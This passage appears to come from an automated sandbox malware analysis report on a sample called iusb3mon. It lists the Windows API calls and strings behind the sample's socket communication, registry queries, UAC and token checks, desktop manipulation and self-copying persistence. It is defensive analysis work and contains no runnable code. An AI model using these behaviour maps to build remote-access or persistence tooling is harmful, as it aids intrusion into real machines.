                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$Library$FreeLoadlstrcpy
                                                                                                                    • String ID: %08X$ADVAPI32.dll$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA
                                                                                                                    • API String ID: 2888591476-2913591164
                                                                                                                    • Opcode ID: d501b422fc5f82e0deaf15fbc164e6c0d5deddfb42ff19197d891f732317061d
                                                                                                                    • Instruction ID: e3a8604e0104de495a6896cd5d9c64b1f102540af01f348d79f96799b6aa1772
                                                                                                                    • Opcode Fuzzy Hash: d501b422fc5f82e0deaf15fbc164e6c0d5deddfb42ff19197d891f732317061d
                                                                                                                    • Instruction Fuzzy Hash: 9561EB71D2021EAFDF65AF95DC84AEF7BB9FB09700F0001A6F919A2150D7719A94CF60
                                                                                                                    Function 06248ADE Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 174libraryloadersynchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 06248B17
                                                                                                                    • GetProcAddress.KERNEL32(00000000,socket), ref: 06248B2C
                                                                                                                    • GetProcAddress.KERNEL32(?,recv), ref: 06248B39
                                                                                                                    • GetProcAddress.KERNEL32(?,connect), ref: 06248B46
                                                                                                                    • GetProcAddress.KERNEL32(?,getsockname), ref: 06248B53
                                                                                                                    • GetProcAddress.KERNEL32(?,select), ref: 06248B60
                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 06248B9D
                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A,?,?,?,?,?,00000010), ref: 06248C38
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000010), ref: 06248CA2
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,00000010), ref: 06248CD3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$ErrorLastLibrary$FreeLoadObjectSingleWait
                                                                                                                    • String ID: connect$getsockname$recv$select$socket$ws2_32.dll
                                                                                                                    • API String ID: 1315272698-1466708075
                                                                                                                    • Opcode ID: e835b7c7d5dd4efa87afd3c417e52786b0b82b669fc205b7ee56661bdd86361b
                                                                                                                    • Instruction ID: 79c7a344de4bda5aea60e9823d78256b2adfa45fa4483f45971cc2d059dbb3d4
                                                                                                                    • Opcode Fuzzy Hash: e835b7c7d5dd4efa87afd3c417e52786b0b82b669fc205b7ee56661bdd86361b
                                                                                                                    • Instruction Fuzzy Hash: 54617972D20218EFDF64AFA0DC88ADEBBB9EF04310F104156FA15E6290D7759A85CF91
                                                                                                                    Function 0625ADCD Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 174windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0625B4CB: GetWindowLongA.USER32(?,000000F0), ref: 0625B4D7
                                                                                                                    • GetParent.USER32(?), ref: 0625ADF8
                                                                                                                    • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 0625AE1B
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0625AE34
                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 0625AE47
                                                                                                                    • CopyRect.USER32(?,?), ref: 0625AE94
                                                                                                                    • CopyRect.USER32(?,?), ref: 0625AE9E
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0625AEA7
                                                                                                                    • CopyRect.USER32(?,?), ref: 0625AEC3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                    • String ID: ($@
                                                                                                                    • API String ID: 808654186-1311469180
                                                                                                                    • Opcode ID: 547f7bf64e158cc0705ed84a649ecfd35cb358c01820df9adaceea097697c4b1
                                                                                                                    • Instruction ID: 948817914eb2c165e9c9a33a3e0e7dbbdc5c9ce2028aac8fe5b880d340e47c33
                                                                                                                    • Opcode Fuzzy Hash: 547f7bf64e158cc0705ed84a649ecfd35cb358c01820df9adaceea097697c4b1
                                                                                                                    • Instruction Fuzzy Hash: 5A516472D10319AFDB60DBA8DC89EEEBBB9AF48710F164265ED11F3180D670E945CB60
                                                                                                                    Function 06245AA1 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 138registrystringprocessCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,00000000,?,?,?,00000000,00000000), ref: 06245AEA
                                                                                                                    • RegQueryValueA.ADVAPI32(00000000,00000000,?,06245CD7), ref: 06245B09
                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?,00000000,00000000), ref: 06245B14
                                                                                                                    • wsprintfA.USER32 ref: 06245B3C
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000000,?,00000000,000F003F,00000000), ref: 06245B5C
                                                                                                                    • RegQueryValueA.ADVAPI32(00000000,00000000,?,06245CD7), ref: 06245B93
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 06245B98
                                                                                                                    • lstrcatA.KERNEL32(?,Function_00027D6C), ref: 06245BDA
                                                                                                                    • lstrcatA.KERNEL32(?,06245CD7), ref: 06245BE6
                                                                                                                    • lstrcpyA.KERNEL32(00000000,06245CD7), ref: 06245BEE
                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 06245C27
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenQueryValuelstrcat$CreateProcesslstrcpywsprintf
                                                                                                                    • String ID: "%1$%s\shell\open\command$D$WinSta0\Default
                                                                                                                    • API String ID: 1351118359-33419044
                                                                                                                    • Opcode ID: 48d26875d3a990628e623c6c4d4f75cd7a0a0cc54d522a214b453c5803f6286c
                                                                                                                    • Instruction ID: b53b504df655d7f8227a15df3e06113e813254beb13fb16aebcd23892a77dd34
                                                                                                                    • Opcode Fuzzy Hash: 48d26875d3a990628e623c6c4d4f75cd7a0a0cc54d522a214b453c5803f6286c
                                                                                                                    • Instruction Fuzzy Hash: 6641307291021DBBDB65ABA1DC49EEF7B7DEB44704F1404A6FA05E2040E7719B84CF60
                                                                                                                    Function 06247715 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 125stringmemoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetVersionExA.KERNEL32(?,00000000,?,00000000), ref: 06247748
                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,?), ref: 06247779
                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 06247780
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 062477A2
                                                                                                                    • GetLastError.KERNEL32 ref: 062477A8
                                                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 062477B8
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 062477D1
                                                                                                                    • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 062477D9
                                                                                                                    • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 062477E6
                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 062477EF
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 062477FA
                                                                                                                    • lstrcpyA.KERNEL32(?,0626E16C), ref: 06247848
                                                                                                                    • lstrcatA.KERNEL32(?,0626E154), ref: 06247892
                                                                                                                    Strings
                                                                                                                    • PromptOnSecureDesktop, xrefs: 06247859
                                                                                                                    • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 0624785E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Token$AuthorityInformationLocalProcess$AllocCloseCountCurrentErrorFreeHandleLastOpenVersionlstrcatlstrcpy
                                                                                                                    • String ID: PromptOnSecureDesktop$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
                                                                                                                    • API String ID: 209792486-2497808001
                                                                                                                    • Opcode ID: 044ffddb50fb89a6b7400c4f396e75d08bde3ed436101c5d7173010004c0a53a
                                                                                                                    • Instruction ID: 9398629999788ec843b2cd8c56c81768d477d51156a8d342f2323fb54a8c4dcb
                                                                                                                    • Opcode Fuzzy Hash: 044ffddb50fb89a6b7400c4f396e75d08bde3ed436101c5d7173010004c0a53a
                                                                                                                    • Instruction Fuzzy Hash: 1B418274D2030AFFEBA46B61DC89EAE7B79EB45740F1100A2FD51A1141E7B18A80EF61
                                                                                                                    Function 062471D0 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 120libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(Ole32.dll,00000000,?,00000000), ref: 062471E4
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 062471F4
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 062471FF
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 0624720A
                                                                                                                    • LoadLibraryA.KERNEL32(Oleaut32.dll,?,?,?,?,?,?,?,?,?,?,?,?,06247A46), ref: 06247214
                                                                                                                    • GetProcAddress.KERNEL32(00000000,SysFreeString), ref: 0624721F
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,06247A46), ref: 062472E1
                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,06247A46), ref: 062472EB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryProc$FreeLoad
                                                                                                                    • String ID: CoCreateInstance$CoInitialize$CoUninitialize$FriendlyName$Ole32.dll$Oleaut32.dll$SysFreeString
                                                                                                                    • API String ID: 2256533930-3340630095
                                                                                                                    • Opcode ID: 2b14ee211fc63f79c2c9108d414d0e10f42327263bd3c36f51f3837267a0d36c
                                                                                                                    • Instruction ID: 2029cc8b842b2d3001bd70a5ad2630c6d369dde5303aaff030e9c93c8f261038
                                                                                                                    • Opcode Fuzzy Hash: 2b14ee211fc63f79c2c9108d414d0e10f42327263bd3c36f51f3837267a0d36c
                                                                                                                    • Instruction Fuzzy Hash: 64413A70E1021AAFDB54EBA5CC88DAFBBB9EF88704B114459F915F7210DB71D902CBA0
                                                                                                                    Function 06248DF3 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 75libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(user32.dll,00000000,00000000,00000000), ref: 06248E24
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThreadDesktop), ref: 06248E37
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 06248E42
                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 06248E4D
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 06248E5B
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 06248E65
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentThreadId), ref: 06248E70
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                    • String ID: CloseDesktop$GetCurrentThreadId$GetThreadDesktop$GetUserObjectInformationA$SetThreadDesktop$kernel32.dll$tDesktop$user32.dll
                                                                                                                    • API String ID: 2238633743-1569342589
                                                                                                                    • Opcode ID: ad7fb6adf26f7c9cda074775338ba90f15a346c37ba8f25ace5229c81d95d22f
                                                                                                                    • Instruction ID: e6cdda1d66f07fd5bcf3d49d17b0086c19ad55de1efc49bf152b3233455a58d7
                                                                                                                    • Opcode Fuzzy Hash: ad7fb6adf26f7c9cda074775338ba90f15a346c37ba8f25ace5229c81d95d22f
                                                                                                                    • Instruction Fuzzy Hash: 75213171E60318BFDB50AFA5DC85A9DBAB8EB44710F014126F951F2150E7B49A418F60
                                                                                                                    Function 06253DFB Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 68libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(USER32,?,?,?,06253F34), ref: 06253E1D
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 06253E35
                                                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 06253E46
                                                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 06253E57
                                                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 06253E68
                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 06253E79
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 06253E8A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                    • String ID: EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                    • API String ID: 667068680-2376520503
                                                                                                                    • Opcode ID: 10e8779e398d3807aac4e9464b1fd10c44bd1d3bcf341be9fa5209a2f1f06ce2
                                                                                                                    • Instruction ID: 3f87e52d153d36390278dca533c219c86d90fc50cb6e7660441d0e04e3ae3f71
                                                                                                                    • Opcode Fuzzy Hash: 10e8779e398d3807aac4e9464b1fd10c44bd1d3bcf341be9fa5209a2f1f06ce2
                                                                                                                    • Instruction Fuzzy Hash: 78115471D21B92AAD3B19F25BCCCC2A7AE6B748792352143EDE08D2D08D7788442CF71
                                                                                                                    Function 0624789D Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 145stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • wsprintfA.USER32 ref: 062478C0
                                                                                                                    • lstrlenA.KERNEL32(?,00000000), ref: 062478E2
                                                                                                                      • Part of subcall function 062491B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00000000), ref: 06249216
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 0624922E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 0624923E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 0624924E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 0624925B
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06249268
                                                                                                                      • Part of subcall function 062491B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 062493F3
                                                                                                                    • getsockname.WS2_32(?,?,00000001), ref: 06247944
                                                                                                                    • GetVersionExA.KERNEL32(?), ref: 06247985
                                                                                                                    • GetLastInputInfo.USER32(?), ref: 062479F3
                                                                                                                    • GetTickCount.KERNEL32 ref: 062479F9
                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 06247A1E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$Library$CountFreeGlobalInfoInputLastLoadMemoryStatusTickVersiongetsocknamelstrlenwsprintf
                                                                                                                    • String ID: 12.12$@$Console$Groupfenzhu$RDP-Tcp$SYSTEM\CurrentControlSet\Services\%s
                                                                                                                    • API String ID: 1372434316-3181356800
                                                                                                                    • Opcode ID: e745104a81381fc6d69e5127a5c16d62740252c48726c9457b51a7237df558cd
                                                                                                                    • Instruction ID: 25aa4dbedb51b3686eadbdcfcc6ffaf55e33a03262121568ba393b05e22c3e99
                                                                                                                    • Opcode Fuzzy Hash: e745104a81381fc6d69e5127a5c16d62740252c48726c9457b51a7237df558cd
                                                                                                                    • Instruction Fuzzy Hash: 8B510FB2D5021CAADBA4EBA1DC49FDE77BCAB08700F004496EA19E6140DB749B84CF61
                                                                                                                    Function 0624898B Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 110libraryloadersleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 062489A5
                                                                                                                    • GetProcAddress.KERNEL32(00000000,closesocket), ref: 062489B0
                                                                                                                    • wsprintfA.USER32 ref: 062489E1
                                                                                                                    • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 06248A3E
                                                                                                                    • GetProcAddress.KERNEL32(00000000,send), ref: 06248A46
                                                                                                                    • GetLastError.KERNEL32 ref: 06248A6B
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 06248AAF
                                                                                                                    • Sleep.KERNEL32(00000002), ref: 06248ABC
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 06248AD4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$AddressLoadProc$CloseErrorFreeHandleLastSleepwsprintf
                                                                                                                    • String ID: ID= %d $closesocket$send$ws2_32.dll
                                                                                                                    • API String ID: 872202526-2339802411
                                                                                                                    • Opcode ID: c5d004a0d962a7cfad923ed8ff34f701ed81febc8f29f14529d1bff2b804dc21
                                                                                                                    • Instruction ID: a23144e966af5320da96d4f311369f7cfc395a2f146bdb54df20f6f14a790705
                                                                                                                    • Opcode Fuzzy Hash: c5d004a0d962a7cfad923ed8ff34f701ed81febc8f29f14529d1bff2b804dc21
                                                                                                                    • Instruction Fuzzy Hash: 4B41A331D20329EFDB54EFA0D849AAEBBB9FF04301F104555F955A6180C7B49A40CF92
                                                                                                                    Function 062438D0 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 93sleepfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06243910
                                                                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 06243921
                                                                                                                    • wsprintfA.USER32 ref: 0624393F
                                                                                                                    • wsprintfA.USER32 ref: 06243959
                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 06243965
                                                                                                                    • wsprintfA.USER32 ref: 06243983
                                                                                                                    • Sleep.KERNEL32(00000064), ref: 0624398A
                                                                                                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 0624399F
                                                                                                                    • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 062439AF
                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 062439BD
                                                                                                                      • Part of subcall function 06243777: LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 06243788
                                                                                                                      • Part of subcall function 06243777: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 062437B8
                                                                                                                      • Part of subcall function 06243777: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 062437D1
                                                                                                                      • Part of subcall function 06243777: GetFileSize.KERNEL32(00000000,00000000), ref: 062437D9
                                                                                                                      • Part of subcall function 06243777: _rand.LIBCMT ref: 0624381A
                                                                                                                      • Part of subcall function 06243777: WriteFile.KERNEL32(?,?,00000400,?,00000000), ref: 0624384F
                                                                                                                      • Part of subcall function 06243777: CloseHandle.KERNEL32(?), ref: 06243860
                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 062439DF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$wsprintf$AttributesCreate$CloseCopyDirectoryFolderHandleLibraryLoadModuleMoveNamePathPointerSizeSleepSpecialWrite_rand
                                                                                                                    • String ID: %s.exe$%s\%s
                                                                                                                    • API String ID: 832629782-3574828809
                                                                                                                    • Opcode ID: 58d6bb7ec948bfff9573efbea055f14ef185cf9d00fbbb306ccccbff6c4328ff
                                                                                                                    • Instruction ID: 690b8ae231cd6b02613000c660ec7a1d430345a181e6e65f77675753423d0f36
